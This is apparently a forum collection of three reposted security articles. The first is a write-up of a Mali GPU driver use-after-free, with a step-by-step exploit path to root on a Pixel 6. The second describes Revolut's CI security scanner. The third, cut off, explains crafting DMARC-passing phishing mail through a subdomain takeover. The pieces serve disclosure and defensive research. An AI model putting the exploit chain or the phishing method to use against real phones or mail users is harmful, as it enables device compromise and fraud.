them are jobs that instruct the kernel to allocate and free JIT memory (BASE_JD_REQ_SOFT_JIT_ALLOC and BASE_JD_REQ_SOFT_JIT_FREE). The life cycle of JIT memory While KBASE_IOCTL_JOB_SUBMIT is a general purpose ioctl call and contains code paths that are responsible for handling different types of GPU jobs, the BASE_JD_REQ_SOFT_JIT_ALLOC job essentially calls kbase_jit_allocate_process, which then calls kbase_jit_allocate to create a JIT memory region. To understand the lifetime and usage of JIT memory, let me first introduce a few different concepts. When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle. In particular, it has three list_head fields that are responsible for managing JIT memory: the jit_active_head, the jit_pool_head, and the jit_destroy_head. As their names suggest, jit_active_head contains memory that is still in use by the user application, jit_pool_head contains memory regions that are not in use, and jit_destroy_head contains memory regions that are pending to be freed and returned to the kernel. Although both jit_pool_head and jit_destroy_head are used to manage JIT regions that are free, jit_pool_head acts like a memory pool and contains JIT regions that are intended to be reused when new JIT regions are allocated, while jit_destroy_head contains regions that are going to be returned to the kernel. When kbase_jit_allocate is called, it’ll first try to find a suitable region in the jit_pool_head: if (info->usage_id != 0) /* First scan for an allocation with the same usage ID */ reg = find_reasonable_region(info, &kctx->jit_pool_head, false); ... if (reg) { ... list_move(®->jit_node, &kctx->jit_active_head); If a suitable region is found, then it’ll be moved to jit_active_head, indicating that it is now in use in userland. Otherwise, a memory region will be created and added to the jit_active_head instead. The region allocated by kbase_jit_allocate, whether it is newly created or reused from jit_pool_head, is then stored in the jit_alloc array of the kbase_context by kbase_jit_allocate_process. When the user no longer needs the JIT memory, it can send a BASE_JD_REQ_SOFT_JIT_FREE job to the GPU. This then uses kbase_jit_free to free the memory. However, rather than returning the backing pages of the memory region back to the kernel immediately, kbase_jit_free first reduces the backing region to a minimal size and removes any CPU side mapping, so the pages in the region are no longer reachable from the address space of the user process: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... //First reduce the size of the backing region and unmap the freed pages old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { u64 new_size = MAX(reg->initial_commit, div_u64(old_pages * (100 - kctx->trim_level), 100)); u64 delta = old_pages - new_size; //Free delta pages in the region and reduces its size to old_pages - delta if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); mutex_unlock(&kctx->reg_lock); } } ... //Remove the pages from address space of user process kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents); Note that the backing pages of the region (reg) are not completely removed at this stage, and reg is also not going to be freed here. Instead, reg is moved back into jit_pool_head. However, perhaps more interestingly, reg is also moved to the evict_list of the kbase_context: kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents); ... mutex_lock(&kctx->jit_evict_lock); /* This allocation can't already be on a list. */ WARN_ON(!list_empty(®->gpu_alloc->evict_node)); //Add reg to evict_list list_add(®->gpu_alloc->evict_node, &kctx->evict_list); atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents); //Move reg to jit_pool_head list_move(®->jit_node, &kctx->jit_pool_head); After kbase_jit_free completed, its caller, kbase_jit_free_finish, will also clean up the reference stored in jit_alloc when the region was allocated, even though reg is still valid at this stage: static void kbase_jit_free_finish(struct kbase_jd_atom *katom) { ... for (j = 0; j != katom->nr_extres; ++j) { if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) { ... if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) { ... kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); } kctx->jit_alloc[ids[j]] = NULL; //<--------- clean up reference } } ... } As we’ve seen before, the memory region in the jit_pool_head list may now be reused when the user allocates another JIT region. So this explains jit_pool_head and jit_active_head. What about jit_destroy_head? When JIT memory is freed by calling kbase_jit_free, it is also put on the evict_list. Memory regions in the evict_list are regions that can be freed when memory pressure arises. By putting a JIT region that is no longer in use in the evict_list, the Mali driver can hold onto unused JIT memory for quick reallocation, while returning them to the kernel when the resources are needed. The Linux kernel provides a mechanism to reclaim unused cached memory, called shrinkers. Kernel components, such as drivers, can define a shrinker object, which, amongst other things, involves defining the count_objects and scan_objects methods: struct shrinker { unsigned long (*count_objects)(struct shrinker *, struct shrink_control *sc); unsigned long (*scan_objects)(struct shrinker *, struct shrink_control *sc); ... }; The custom shrinker can then be registered via the register_shrinker method. When the kernel is under memory pressure, it’ll go through the list of registered shrinkers and use their count_objects method to determine potential amount of memory that can be freed, and then use scan_objects to free the memory. In the case of the Mali GPU driver, the shrinker is defined and registered in the kbase_mem_evictable_init method: int kbase_mem_evictable_init(struct kbase_context *kctx) { ... //kctx->reclaim is a shrinker kctx->reclaim.count_objects = kbase_mem_evictable_reclaim_count_objects; kctx->reclaim.scan_objects = kbase_mem_evictable_reclaim_scan_objects; ... register_shrinker(&kctx->reclaim); return 0; } The more interesting part of these methods is the kbase_mem_evictable_reclaim_scan_objects, which is responsible for freeing the memory needed by the kernel. static unsigned long kbase_mem_evictable_reclaim_scan_objects(struct shrinker *s, struct shrink_control *sc) { ... list_for_each_entry_safe(alloc, tmp, &kctx->evict_list, evict_node) { int err; err = kbase_mem_shrink_gpu_mapping(kctx, alloc->reg, 0, alloc->nents); ... kbase_free_phy_pages_helper(alloc, alloc->evicted); ... list_del_init(&alloc->evict_node); ... kbase_jit_backing_lost(alloc->reg); //<------- moves `reg` to `jit_destroy_pool` } ... } This is called to remove cached memory in jit_pool_head and return it to the kernel. The function kbase_mem_evictable_reclaim_scan_objects goes through the evict_list, unmaps the backing pages from the GPU (recall that the CPU mapping is already removed in kbase_jit_free) and then frees the backing pages. It then calls kbase_jit_backing_lost to move reg from jit_pool_head to jit_destroy_head: void kbase_jit_backing_lost(struct kbase_va_region *reg) { ... list_move(®->jit_node, &kctx->jit_destroy_head); schedule_work(&kctx->jit_work); } The memory region in jit_destroy_head is then picked up by the kbase_jit_destroy_worker, which then frees the kbase_va_region in jit_destroy_head and removes references to the kbase_va_region entirely. Well not entirely…one small pointer still holds out against the clean up logic. And lifetime management is not easy for the pointers in the fortified camps of the Arm Mali regime. The clean up logic in kbase_mem_evictable_reclaim_scan_objects is not responsible for removing the reference in jit_alloc from when the JIT memory is allocated, but this is not a problem, because as we’ve seen before, this reference was cleared when kbase_jit_free_finish was called to put the region in the evict_list and, normally, a JIT region is only moved to the evict_list when the user frees it via a BASE_JD_REQ_SOFT_JIT_FREE job, which removes the reference stored in jit_alloc. But we don’t do normal things here, nor do the people who seek to compromise devices. The vulnerability While the semantics of memory eviction is closely tied to JIT memory with most eviction functionality referencing “JIT” (for example, the use of kbase_jit_backing_lost in kbase_mem_evictable_reclaim_objects), evictable memory is more general and other types of GPU memory can also be added to the evict_list and be made evictable. This can be achieved by calling kbase_mem_evictable_make to add memory regions to the evict_list and kbase_mem_evictable_unmake to remove memory regions from it. From userspace, these can be called via the KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl. Depending on whether the KBASE_REG_DONT_NEED flag is passed, a memory region can be added or removed from the evict_list: int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr, unsigned int flags, unsigned int mask) { ... prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED; new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED; if (prev_needed != new_needed) { ... if (new_needed) { ... ret = kbase_mem_evictable_make(reg->gpu_alloc); //<------ Add to `evict_list` if (ret) goto out_unlock; } else { kbase_mem_evictable_unmake(reg->gpu_alloc); //<------- Remove from `evict_list` } } By putting a JIT memory region directly in the evict_list and then creating memory pressure to trigger kbase_mem_evictable_reclaim_scan_objects, the JIT region will be freed with a pointer to it still stored in jit_alloc. After that, a BASE_JD_REQ_SOFT_JIT_FREE job can be submitted to trigger kbase_jit_free_finish to use the freed object pointed to in jit_alloc: static void kbase_jit_free_finish(struct kbase_jd_atom *katom) { ... for (j = 0; j != katom->nr_extres; ++j) { if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) { ... if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) { ... kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); //<----- Use of the now freed jit_alloc[ids[j]] } kctx->jit_alloc[ids[j]] = NULL; } } Amongst other things, kbase_jit_free will first free some of the backing pages in the now freed kctx->jit_alloc[ids[j]]: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { ... u64 delta = old_pages - new_size; if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region mutex_unlock(&kctx->reg_lock); } } So by replacing the freed JIT region with a fake object, I can potentially free arbitrary pages, which is a very powerful primitive. Exploiting the bug As explained before, this bug is triggered when the kernel is under memory pressure and calls kbase_mem_evictable_reclaim_scan_objects via the shrinker mechanism. From a user process, the required memory pressure can be created as simply as mapping a large amount of memory using the mmap system call. However, the exact amount of memory required to trigger the shrinker scanning is uncertain, meaning that there is no guarantee that a shrinker scan will be triggered after such an allocation. While I can try to allocate an excessive amount of memory to ensure that the shrinker scanning is triggered, doing so risks causing an out-of-memory crash and may also cause the object replacement to be unreliable. This causes problems in triggering and exploiting the bug reliably. It would be good if I could allocate memory incrementally and check whether the JIT region is freed by kbase_mem_evictable_reclaim_scan_objects after each allocation step and only proceed with the exploit when I’m sure that the bug has been triggered. The Mali driver provides an ioctl, KBASE_IOCTL_MEM_QUERY for querying properties of memory regions at a specific GPU address. If the address is invalid, the ioctl will fail and return an error. This allows me to check whether the JIT region is freed, because when kbase_mem_evictable_reclaim_scan_objects is called to free the JIT region, it’ll first remove its GPU mappings, making its GPU address invalid. By using the KBASE_IOCTL_MEM_QUERY ioctl to query the GPU address of the JIT region after each allocation, I can therefore check whether the region has been freed by kbase_mem_evictable_reclaim_scan_objects or not, and only start spraying the heap to replace the JIT region when it is actually freed. Moreover, the KBASE_IOCTL_MEM_QUERY ioctl doesn’t involve memory allocation, so it won’t interfere with the object replacement. This makes it perfect for testing whether the bug has been triggered. Although shrinker is a kernel mechanism for freeing up evictable memory, the scanning and removal of evictable objects via shrinkers is actually performed by the process that is requesting the memory. So for example, if my process is mapping some memory to its address space (via mmap and then faulting the pages), and the amount of memory that I am mapping creates sufficient memory pressure that a shrinker scan is triggered, then the shrinker scan and the removal of the evictable objects will be done in the context of my process. This, in particular, means that if I pin my process to a CPU while the shrinker scan is triggered, the JIT region that is removed during the scan will be freed on the same CPU. (Strictly speaking, this is not a hundred percent correct, because the JIT region is actually scheduled to be freed on a worker, but most of the time, the worker is indeed executed immediately on the same CPU.) This helps me to replace the freed JIT region reliably, because when objects are freed in the kernel, they are placed within a per CPU cache, and subsequent object allocations on the same CPU will first be allocated from the CPU cache. This means that, by allocating another object of similar size on the same CPU, I’m likely to be able to replace the freed JIT region. Moreover, the JIT region, which is a kbase_va_region, is actually a rather large object that is allocated in the kmalloc-256 cache, (which is used to allocate objects of size between 256-512 bytes when kmalloc is called) instead of the kmalloc-128 cache, (which allocates objects of size less than 128 bytes), and the kmalloc-256 cache is a less used cache. This, together with the relative certainty of the CPU that frees the JIT region, allows me to reliably replace the JIT region after it is freed. Replacing the freed object Now that I can reliably replace the freed JIT region, I can look at how to exploit the bug. As explained before, the freed JIT memory can be used as the reg argument in the kbase_jit_free function to potentially be used for freeing arbitrary pages: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { ... u64 delta = old_pages - new_size; if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region mutex_unlock(&kctx->reg_lock); } } One possibility is to use the well-known heap spraying technique to replace the freed JIT region with arbitrary data using sendmsg. This would enable me to create a fake kbase_va_region with a fake gpu_alloc and fake pages that could be used to free arbitrary pages in kbase_mem_shrink: int kbase_mem_shrink(struct kbase_context *const kctx, struct kbase_va_region *const reg, u64 new_pages) { ... err = kbase_mem_shrink_gpu_mapping(kctx, reg, new_pages, old_pages); if (err >= 0) { /* Update all CPU mapping(s) */ kbase_mem_shrink_cpu_mapping(kctx, reg, new_pages, old_pages); kbase_free_phy_pages_helper(reg->cpu_alloc, delta); //<------- free pages in cpu_alloc if (reg->cpu_alloc != reg->gpu_alloc) kbase_free_phy_pages_helper(reg->gpu_alloc, delta); //<--- free pages in gpu_alloc In order to do so, I’d need to know the addresses of some data that I can control, so I could create a fake gpu_alloc and its pages field at those addresses. This could be done either by finding a way to leak addresses of kernel objects, or use techniques like the one I wrote about in the Section “The Ultimate fake object store” in my other post. But why use a fake object when you can use a real one? The JIT region that is involved in the use-after-free bug here is a kbase_va_region, which is a complex object that has multiple states. Many operations can only be performed on memory objects with a correct state. In particular, kbase_mem_shrink can only be used on a kbase_va_region that has not been mapped multiple times. The Mali driver provides the KBASE_IOCTL_MEM_ALIAS ioctl that allows multiple memory regions to share the same backing pages. I’ve written about how KBASE_IOCTL_MEM_ALIAS works in more details in my previous post, but for the purpose of this exploit, the crucial point is that KBASE_IOCTL_MEM_ALIAS can be used to create memory regions in the GPU and user address spaces that are aliased to a kbase_va_region, meaning that they are backed by the same physical pages. If a kbase_va_region reg is mapped multiple times by using KBASE_IOCTL_MEM_ALIAS and then has its backing pages freed by kbase_mem_shrink, then only the memory mappings in reg are removed, so the alias regions created by KBASE_IOCTL_MEM_ALIAS can still be used to access the freed backing pages. To prevent kbase_mem_shrink from being called on aliased JIT memory, kbase_mem_alias checks for the KBASE_REG_NO_USER_FREE, so that JIT memory cannot be aliased: u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride, u64 nents, struct base_mem_aliasing_info *ai, u64 *num_pages) { ... for (i = 0; i < nents; i++) { if (ai[i].handle.basep.handle < BASE_MEM_FIRST_FREE_ADDRESS) { if (ai[i].handle.basep.handle != BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE) ... } else { ... if (aliasing_reg->flags & KBASE_REG_NO_USER_FREE) //<-- 2. goto bad_handle; /* JIT regions can't be * aliased. NO_USER_FREE flag * covers the entire lifetime * of JIT regions. The other * types of regions covered * by this flag also shall * not be aliased. ... } Now suppose I trigger the bug and replace the freed JIT region with a normal memory region allocated via the KBASE_IOCTL_MEM_ALLOC ioctl, which is an object of the exact same type, but without the KBASE_REG_NO_USER_FREE flag that is associated with a JIT region. I then use KBASE_IOCTL_MEM_ALIAS to create an extra mapping for the backing store of this new region. All these are valid as I’m just aliasing a normal memory region that does not have the KBASE_REG_NO_USER_FREE flag. However, because of the bug, a dangling pointer in jit_alloc also points to this new region, which has now been aliased. If I now submit a BASE_JD_REQ_SOFT_JIT_FREE job to call kbase_jit_free on this memory, then kbase_mem_shrink will be called, and part of the backing store in this new region will be freed, but the extra mappings created in the aliased region will not be removed, meaning that I can still access the freed backing pages from the alias region. By using a real object of the same type, not only do I save the effort needed to craft a fake object, but it also reduces the risk of having side effects that could result in a crash. The situation is now very similar to what I had in my previous post and the exploit flow from this point on is also very similar. For completeness, I’ll give an overview of how the exploit works here, but readers who are interested can take a look at more details from the Section “Breaking out of the context” onwards in that post. To recap, I now have access to the backing pages in a kbase_va_region object that is already freed and I’d like to reuse these freed backing pages so I can gain read and write access to arbitrary memory. To understand how this can be done, we need to know how backing pages to a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used: int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages, struct tagged_addr *pages, bool partial_allowed) { ... /* Get pages from this pool */ while (nr_from_pool--) { p = kbase_mem_pool_remove_locked(pool); //<------- 1. ... } ... if (i != nr_4k_pages && pool->next_pool) { /* Allocate via next pool */ err = kbase_mem_pool_alloc_pages(pool->next_pool, //<----- 2. nr_4k_pages - i, pages + i, partial_allowed); ... } else { /* Get any remaining pages from kernel */ while (i != nr_4k_pages) { p = kbase_mem_alloc_page(pool); //<------- 3. ... } ... } ... } The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages are allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool, is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel). When freeing a page, the opposite happens: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context, if the memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator. As noted in my previous post, pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context. It is also used for allocating page table global directories (PGD) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found in my previous post.) As the bottom level PGD stores the physical addresses of the backing pages to GPU virtual memory addresses, being able to write to PGD will allow me to map arbitrary physical pages to the GPU memory, which I can then read from and write to by issuing GPU commands. This gives me access to arbitrary physical memory. As physical addresses for kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite arbitrary kernel code and gain arbitrary kernel code execution. In the following figure, the green block indicates the same page being reused as the PGD. To summarize, the exploit involves the following steps: Create JIT memory. Mark the JIT memory as evictable. Increase memory pressure by mapping memory to the user space via normal mmap system calls. Use the KBASE_IOCTL_MEM_QUERY ioctl to check if the JIT memory is freed. Carry on applying memory pressure until the JIT region is freed. Allocate new GPU memory regions using the KBASE_IOCTL_MEM_ALLOC ioctl to replace the freed JIT memory. Create an alias region to the new GPU memory region that replaced the JIT memory so that the backing pages of the new GPU memory are shared with the alias region. Submit a BASE_JD_REQ_SOFT_JIT_FREE job to free the JIT region. As the JIT region is now replaced by the new memory region, this will cause kbase_jit_free to remove the backing pages of the new memory region, but the GPU mappings created in the alias region in step 6. will not be removed. The alias region can now be used to access the freed backing pages. Reuse the freed backing pages as PGD of the kbase_context. The alias region can now be used to rewrite the PGD. I can then map arbitrary physical pages to the GPU address space. Map kernel code to the GPU address space to gain arbitrary kernel code execution, which can then be used to rewrite the credentials of our process to gain root, and to disable SELinux. The exploit for Pixel 6 can be found here with some setup notes. Disclosure and patch gapping At the start of the post, I mentioned that I initially reported this bug to the Android Security team, but it was later dismissed as a “Won’t fix” bug. While it is unclear to me why such a decision was made, it is perhaps worth taking a look at the wider picture instead of treating this as an isolated incident. There has been a long history of N-day vulnerabilities being exploited in the Android kernel, many of which were fixed in the upstream kernel but didn’t get ported to Android. Perhaps the most infamous of these was CVE-2019-2215 (Bad Binder), which was initially discovered by the syzkaller fuzzer in November 2017 and patched in February 2018. However, this fix was never included in an Android monthly security bulletin until it was rediscovered as an exploited in-the-wild bug in September 2019. Another exploited in-the-wild bug, CVE-2021-1048, was introduced in the upstream kernel in December 2020, and was fixed upstream a few weeks later. The patch, however, was not included in the Android Security Bulletin until November 2021, when it was discovered to be exploited in-the-wild. Yet another exploited in-the-wild vulnerability, CVE-2021-0920, was found in 2016 with details visible in a Linux kernel email thread. The report, however, was dismissed by kernel developers at the time, until it was rediscovered to be exploited in-the-wild and patched in November 2021. To be fair, these cases were patched or ignored upstream without being identified as security issues (for example, CVE-2021-0920 was ignored), making it difficult for any vendor to identify such issues before it’s too late. This again shows the importance of properly addressing security issues and recording them by assigning a CVE-ID, so that downstream users can apply the relevant security patches. Unfortunately, vendors sometimes see having security vulnerabilities in their products as a damage to their reputation and try to silently patch or downplay security issues instead. The above examples show just how serious the consequences of such a mentality can be. While Android has made improvements to keep the kernel branches more unified and up-to-date to avoid problems such as CVE-2019-2215, where the vulnerability was patched in some branches but not others, some recent disclosures highlight a rather worrying trend. On March 7th, 2022, CVE-2022-0847 (Dirty pipe) was disclosed publicly, with full details and a proof-of-concept exploit to overwrite read-only files. While the bug was patched upstream on February 23rd, 2022, with the patch merged into the Android kernel on February, 24th, 2022, the patch was not included in the Android Security Bulletin until May 2022 and the public proof-of-concept exploit still ran successfully on a Pixel 6 with the April patch. While this may look like another incident where a security bug was patched silently upstream, this case was very different. According to the disclosure timeline, the bug report was shared with the Android Security Team on February 21st, 2022, a day after it was reported to the Linux kernel. Another vulnerability, CVE-2021-39793 in the Mali driver, was patched by Arm in version r36p0 of the driver (as CVE-2022-22706), which was released on February 11th, 2022. The patch was only included in the Android Security Bulletin in March as an exploited in-the-wild bug. Yet another vulnerability, CVE-2022-20186 that I reported to the Android Security Team on January 15th, 2022, was patched by Arm in version r37p0 of the Mali driver, which was released on April 21st, 2022. The patch was only included in the Android Security Bulletin in June and a Pixel 6 running the May patch was still affected. Taking a look at security issues reported by Google’s Project Zero team, between June and July 2022, Jann Horn of Project Zero reported five security issues (2325, 2327, 2331, 2333, 2334) in the Arm Mali GPU that affected the Pixel phones. These issues were promptly fixed as CVE-2022-33917 and CVE-2022-36449 by the Arm security team on July 25th, 2022 (CVE-2022-33917 in r39p0) and on August 18th, 2022 (CVE-2022-36449 in r38p1). The details of these bugs, including proof of concepts, were disclosed on September 18th, 2022. However, at least some of the issues remained unfixed in December 2022, (for example, issue 2327 was only fixed silently in the January 2023 patch, without mentioning the CVE ID) after Project zero published a blog post highlighting the patching problem with these particular issues on November 22nd, 2022. In all of these instances, the bugs were only patched in Android a couple months after a patch was publicly released upstream. In light of this, the response to this current bug is perhaps not too surprising. The year is 2023 A.D., and it’s still easy to pwn Android with N-days entirely. Well, yes, entirely. Notes Observant readers who learn their European history from a certain comic series may recognise the similarities between this and the openings to the Asterix series, which usually starts with: “The year is 50 BC. Gaul is entirely occupied by the Romans. Well, not entirely… One small village of indomitable Gauls still holds out against the invaders. And life is not easy for the Roman legionaries who garrison the fortified camps of Totorum, Aquarium, Laudanum and Compendium…” Sursa: https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/
-
- 1
-
Krzysztof Pranczk Jan 3 Security Drone: Scaling Continuous Security at Revolut Intro As we’re continuously growing and extending our product offerings, we can face many technological challenges. These challenges are solved by our engineers and this results in many features, changes and updates being developed and successfully delivered to our customers. However, with the development of new features comes many security challenges that are faced by the internal Application Security Team. This lovely bunch is responsible for the security assurance of every new feature developed by our engineers. To provide the highest level of security assurance to our products, we’ve implemented a number of processes placed in different stages of the Software Development Life Cycle (SDLC), including automated scans in our CI/CD pipelines. However, it wouldn’t be possible to efficiently triage every security finding produced by automated scanners. In July 2022, there were nearly 39,000 commits created by over 900 authors! To address this challenge, we developed Security Drone. In this article, we’d like to share with you our approach to provide the highest security assurance in fast CI/CD environments. Challenges faced by Revolut The classic approach to security testing requires the security teams to perform a manual review of any developed features, with the help of automated security scans. Traditionally, this work was executed on a risk and priority basis and that need was stretching the team beyond its capacity. Additionally, the team had to cope with the numerous CI pipelines across the company. This approach wasn’t a viable solution in terms of scaling, quality and coverage. Some of you may have an idea of the security challenges faced in a fast CI/CD environment. If not, let us make a little recap of the challenges we’ve been facing: Software changes are constantly increasing New changes are integrated and deployed every day Engineers tend to prioritise the development of functionalities over security The internal application security team can’t be big enough to have a dedicated security engineer for each project — both internal and external AppSec teams nowadays must work on automating the work they were doing 10 years ago in a manual way With more tools integrated into the pipelines, the timeline of each job increases, which negatively affects the development experience And many more challenges you probably observe in your companies too! First solution — The classic approach to CI/CD pipeline scans Our first solution, and the most simplistic one, was to onboard automated security scanners like Static Application Security Testing (SAST) and Software Composition Analysis (SCA) and review the findings within the AppSec team. It worked, but we started facing another problem: the company was growing, and from an initial handful of projects, now we had to deal with thousands of projects and non-stop builds at any given time. As a result, we had to manage hundreds of CI pipelines used for security purposes. Let’s see some numbers of what we observed in our environment. Every 24h of a working day were about 950 new pull requests (PR) with nearly 1.85 commits per PR. During working hours, automated scans were executed 3–4 times per minute, on average, against various projects. The chart below presents how many security scans were performed on the 14th of July 2022 every 30 minutes. Number of automated security scans per 30minutes With those numbers, we faced another challenge — triaging all of the security findings. These scans produced a high number of false positive vulnerabilities that had to be manually triaged by the security team. Initially, we didn’t think scanning every software change was the way to go, we should only be scanning the changes intended for the Production environment. We did the analysis and concluded that about 81% of the commits had a final destination to the main branch, and we were facing the same challenge. Our scanners would be completing at least three successful security scans on a software change every minute! This amount of scans would still result in a potentially high number of false positives, which had to be reviewed and triaged within a certain period of time. Not only that, but more and more security scanners within CI/CD pipelines would affect their timelines negatively. So we thought: ‘Do we really have to go in this direction? Do we have to manage all of the pipelines for various projects and triage all of the identified security issues within the AppSec Team? Do we have to affect CI/CD timelines negatively?’ At this point, we had a lot of doubts and questions about this approach. In the Application Security team we understood this approach wouldn’t be scalable in a fast-paced environment such as Revolut. We could implement some small improvements to address each of these questions. However, those improvements could just delay bigger problems for later on. At this point, we decided to go in a slightly different direction, having a security-shift-left approach in our minds. Security static analysis tools can easily be shifted left to an earlier phase in the SDLC, since these types of tools don’t require the application to be running. Second solution — Security Drone You may expect as a second solution something extremely smart and well-designed. So did we. But it didn’t take long for us to take an agile approach with lean implementations. We also started security shifting left and communicating security issues to developers as early as possible, before going into testing or production environments. At the beginning of our MVP solution, we decided to scan code changes during the pull request phase. In our opinion, it was a natural step for engineers to propose software changes for their colleagues to approve. At this point, we also decided to communicate all of the identified security findings to developers. The scanner’s results could be taken into account during code review, which is an integral part of the development process in Revolut. It should be noted that our scanner was triggered when a new PR was created or code was updated in an already existing PR. We also decided to place Security Drone in a Kubernetes cluster to scan the code independently from CI/CD pipelines and have a centralised scans management. In many cases, independent scans were able to deliver results to developers faster than CI jobs were finished. Initially, we implemented only a SAST scanner solution to make the process as fast as possible, to quickly deliver results to developers. We aimed to provide results in under 300 seconds. We carefully researched available SAST solutions to choose the most suitable one for our needs. It had to be fast, well-documented and allow us to write custom rules to identify potential security issues specific to our environment. Last but not least, we wanted to achieve the lowest possible false positive rate to avoid producing irrelevant findings, to limit the amount of manual work that we had to cope with during triaging. But not only that, as we had decided to communicate all of the identified security findings to developers at the PR page, we had to make sure not to affect their experience negatively by reviewing a number of irrelevant findings. Later, we started implementing new scanners in Security Drone such as Software Composition Analysis and Infrastructure as Code to bring more value to the automated security testing. Security Drone’s high level architecture is presented below. Architecture of Security Drone Currently, we scan all pull requests created by Revolut engineers. In July, Security Drone performed over 39,000 scans. Median scanning time is below 112 seconds and the average is below 110 seconds. Initially, we used 19 SAST and 63 IaC rules. Only high and critical SCA issues were directly reported to our developers. Our first MVP was released in Q1 2022, extended and adjusted in the last months. Now, Security Drone has been operating in production for the last eight months without issues on both the operational and engineering distribution sides. We use the following tools in Security Drone: Semgrep — Static Application Security Testing Snyk Open Source — Software Composition Analysis Checkov — Infrastructure as a Code What have we achieved with Security Drone? We have adopted a shift-left approach to security to identify and communicate security findings earlier in the SDLC, before going into testing or production environments Security issues can be fixed before going into production, and as a result, they don’t have to be manually triaged by AppSec Team members Only merged security issues are reported to the AppSec Team to triage and loop into the vulnerability lifecycle process We lowered the false positive rate by carefully choosing the SAST solution and continual tuning of rules. We were able to achieve ~3.8% FP rate! Our centrally managed scanner currently scans 100% of the code in Revolut which saves us hundreds of hours of manual reviews. Here are some numbers from last 24 hours: • Nearly 1700 pull requests were scanned • Over 3900 scans associated with above PRs were performed Ability to find new vulnerabilities in other applications based on patterns The scans are fast and don’t disrupt the developer experience. They’re executed in parallel and scanning times are presented below: • Median scanning time for SAST is 11 seconds • Median scanning time for IaC is 22 seconds • Median scanning time for SCA is 101 seconds Increased security awareness and continuous learning amongst engineers. They’re also aware of the direction that AppSec is moving. What is next? Security Drone will always be under development as new technologies are emerging and improvements to the development experience can be made. On our roadmap we have various points, some of which include: Ability to flag findings as a false positive in a developer-friendly way Incremental SAST scans — scan only code changes in PRs Integration of more security scanners and the development of more SAST/IaC rules Keep your eyes peeled for our next blogpost around Application Security in Revolut, as we may share more interesting tools and guides on how we solve the challenges we face every day. Credits Credits go to every Revolut AppSec engineer involved in the design and development of Security Drone, especially: Arsalan Ghazi, Krzysztof Pranczk, Pedro Moura, Roger Norton Sursa: https://medium.com/revolut/security-drone-scaling-continuous-security-at-revolut-862bcd55956e
-
DMARC Identifier Alignment: relax, don't do it, when you want to go to it Jan 25, 2023 in HACKING • MAILSECURITY dmarc spf dkim 9 min read From subdomain takeover to phishing mails TL;DR; if you have a subdomain takeover for a given domain, and default DMARC alignment settings, you can create emails that passes SPF and DMARC for phishing purposes. DKIM, however, cannot be passed for the domain but a trick is possible to make emails look more trustworthy. Introduction I like Mozilla’s definition of a subdomain takeover: A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. This can happen because either a virtual host hasn’t been published yet or a virtual host has been removed. An attacker can take over that subdomain by providing their own virtual host and then hosting their own content for it. The usual impact of the above is phishing or cookies' theft from impersonated web pages. Subdomain takeover have consequences in mail security too, and not just on the vulnerable subdomain but also on the organizational one. This article is a practical example of how to craft phishing emails from a subdomain takeover. Prerequisites Vulnerable subdomain One needs a subdomain takeover where the target of a DNS record is fully under his control. E.g. for a vulnerable domain of altf8.fr (I own it), a DNS CNAME record as follow is needed: takeover IN CNAME sub.dangling.com. $ dig +short takeover.altf8.fr sub.dangling.com. where dangling.com is not registered (anymore). One can then claim the dangling.com domain and control its DNS zone, hence making sub.dangling.com point to a controlled server. The above is important as a subdomain takeover pointing to third-parties websites such as Github etc. will not allow an attacker control over a DNS zone or a server which is crucial for the technique describe here to 